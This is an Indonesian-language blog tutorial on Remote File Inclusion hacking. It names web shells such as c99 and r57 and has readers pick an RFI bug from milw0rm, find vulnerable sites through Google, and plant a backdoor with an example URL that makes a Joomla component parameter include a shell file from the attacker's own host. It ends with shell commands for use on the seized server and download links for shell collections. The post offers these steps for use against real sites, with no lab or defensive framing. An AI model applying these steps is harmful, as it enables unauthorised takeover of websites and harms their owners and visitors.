Flag Counter

free counters

google search

Loading

Facebook comment

.

Web hosting

---

Hack dengan RFI (REmote File Inclusion)

ketemu lagi dengan saya, ini adalah tutorial kedua saya, mungkin saya disini akan menceritakanbagaimana akhirnya bisa mengerti metode RFI Hacking
sebelum kita masuk kedalam RFI ada baiknya mengetahui Web-hell dahulu,sebab nanti ini kan di pakai dalam RFI
macam-macam web-shell:
1. c99
2. c100
3. r57
4. ekin0x
5. locus7
bagamana mencarinya backdoor tersebut, kita cari melalui google
lagi-lagi intro nih, yups betul, agar lebih paham aja gitu
RFI apa itu????

RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor!
=======
PERTAMA
=======
sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2………..
AMIEN !!!
=======
KEDUA
=======
ok setelah kita bedoa, bukalah www.milw0rm.com
kemudian klik search
kemudian tulislah RFI

KETIGA

udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu
=
KEEMPAT
=
setelah kita dapat bugnya kemudian kita search denga google
example bug:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code]

KELIMA

kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor
example:
wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.punyasaya.net/backdoor/c99.txt??

KEENAM

apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi
apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah anda kuasai, dan selanjutnya terserah anda…
perintah yang berguna saat melakukan aktivitas backdooring:
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
sekian tutorial dari saya, bukannya saya mau sok tahu, tapi saya cuma mau berbagi apa yang udah saya dapet selama ini, apabila da yang kurang
mohon maaf

untuk download kumpulan shell dapat di Link berikut:
Link1
Link1



Artikel Terkait:
Label: ,

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

SDIT ANNUR GEMOLONG

SDIT ANNUR GEMOLONG
dulu pemilik blpog ini sekolah disini